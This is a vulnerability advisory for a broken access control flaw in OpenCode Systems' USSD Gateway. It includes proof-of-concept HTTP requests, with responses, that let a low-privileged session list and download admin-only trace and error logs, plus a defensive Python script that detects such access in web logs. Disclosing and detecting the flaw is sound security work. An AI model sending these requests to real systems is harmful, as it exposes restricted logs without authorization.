# [CVE-2025-65239] USSD Gateway Broken Access Control - Logs

## Description

Broken Access Control in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems](https://opencode.com/) allows a user with low-privileged access to enumerate all the trace/error log files, which are restricted to admin accounts. \
<https://www.cve.org/CVERecord?id=CVE-2025-65239>

## Application Details

* **Name**: USSD Gateway
* **Vendor**: OpenCode Systems
* **Version**: OC Release 5 - Version 6.13.11

## Technical Details

* **Vulnerable Endpoint "All files"**: `/occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1`
* **Vulnerable Endpoint "Specific file"**: `/occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log`

## Exploitation

The vulnerability allows a low-privileged user to enumerate the trace and error log files with the same result an admin user would get.

From the low-privileged user's session, send the request below:

```http
GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
```

```http
HTTP/2 200 OK
Cache-Control: private-control
Pragma: no-cache
[...]

callback ( '<TABLE width="100%" border=0 cellpadding="0" cellspacing=0 align=center> <TR><TD width=100% valign=top align=right> <TABLE width="100%" border=0 cellpadding=2 cellspacing=2 height=30 class=txt> <TR><TD valign="top" align=left width=70%>Directory: <b>/aux1/ocussd/trace/</b></TD> <TD valign="top" width=30% align=right class=txt><b>Server: SERVER-NAME</b></TD></TR> </table></td></TR> <tr><td align=left><p> <table width="100%" border=0 cellpadding=2 cellspacing=2 class=txt align=left><tr class="tablehdr" style="height: 17px;"> <td class="txt_head" style="width: 40%; text-align: center; white-space: nowrap;">File Name</td><td class="txt_head" style="width: 20%; text-align: center; white-space: nowrap;">Date</td><td class="txt_head" style="width: 10%; text-align: center; white-space: [...]

[...]
```

Additionally, you can retrieve a specific file using the request below:

```http
GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
```

<figure><img src="https://3235815904-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaajIXL4hyMVEViygzqgu%2Fuploads%2F8zmpl3SdRJ7sA740Gg3J%2Fimage.png?alt=media&#x26;token=4cc98799-cc1c-4ad8-86b6-49486c9977f6" alt=""><figcaption></figcaption></figure>
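As an added example (not part of the original advisory and not OpenCode's own code), the following Python script shows how a defender could spot this access pattern in web-server access logs while the fix is being rolled out. It parses a constructed Apache-style access log whose final quoted field is assumed to be the `OCPANEL-SESSIONID` cookie value (an assumed `LogFormat` using `%{OCPANEL-SESSIONID}C`), maps session ids to panel roles through a constructed lookup table, and flags every successful `ListFiles` or `GetFile` call to the `ocussdgw` `LogsViewer` module that did not come from an admin session. The IPs, timestamps, session ids, file names and role map are all constructed; only the endpoint and parameter names come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Access-log regex for an assumed Apache LogFormat that appends the
# OCPANEL-SESSIONID cookie value as a final quoted field (%{OCPANEL-SESSIONID}C).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<session>[^"]*)"$'
)

# LogsViewer functions from the advisory that return trace/error log data.
LOGS_VIEWER_FUNCS = {"ListFiles", "GetFile"}

# Constructed sample log: one admin listing, one non-admin listing and file
# fetch (the CVE pattern), one unrelated page, and one denied attempt.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2025:10:00:01 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2.0" 200 5120 "sess-admin-1"
10.0.0.9 - - [01/Dec/2025:10:00:07 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2.0" 200 5120 "sess-user-7"
10.0.0.9 - - [01/Dec/2025:10:00:12 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace1.log HTTP/2.0" 200 88000 "sess-user-7"
10.0.0.9 - - [01/Dec/2025:10:01:00 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=Dashboard HTTP/2.0" 200 900 "sess-user-7"
10.0.0.12 - - [01/Dec/2025:10:02:30 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace1.log HTTP/2.0" 403 120 "sess-user-9"
"""

# Constructed session-to-role table (in practice taken from the panel's session store).
SESSION_ROLES = {"sess-admin-1": "admin", "sess-user-7": "user", "sess-user-9": "user"}


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def logs_viewer_call(target):
    """Return (op_func, op_param) if the request targets the ocussdgw LogsViewer module, else None."""
    parts = urlsplit(target)
    if parts.path != "/occontrolpanel/index.php":
        return None
    # Split only on '&' so the ';'-delimited op_param value stays intact.
    q = parse_qs(parts.query, separator="&")
    if q.get("w") != ["ocussdgw"] or q.get("op") != ["LogsViewer"]:
        return None
    op_func = q.get("op_func", [""])[0]
    if op_func not in LOGS_VIEWER_FUNCS:
        return None
    return op_func, q.get("op_param", [""])[0]


def find_unauthorized_log_access(log_text, session_roles):
    """Flag successful (HTTP 200) LogsViewer calls made by sessions whose role is not admin.

    Unknown session ids are treated as non-admin so they are reported rather than ignored.
    A 403 on these endpoints is the expected post-fix behaviour and is not flagged.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] != "200":
            continue
        call = logs_viewer_call(rec["target"])
        if call is None:
            continue
        role = session_roles.get(rec["session"], "unknown")
        if role != "admin":
            op_func, op_param = call
            findings.append({
                "ip": rec["ip"], "session": rec["session"], "role": role,
                "op_func": op_func, "op_param": op_param, "ts": rec["ts"],
            })
    return findings


if __name__ == "__main__":
    for f in find_unauthorized_log_access(SAMPLE_LOG, SESSION_ROLES):
        print(f"ALERT {f['ts']} {f['ip']} session={f['session']} role={f['role']} "
              f"{f['op_func']} {f['op_param']}")
```

The detection keys on the response status as well as the request: before the fix, a non-admin session receives a 200 with the file list or file contents, which is the indicator; after the server enforces the admin role on `LogsViewer`, the same request should log a 403 and stop matching.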
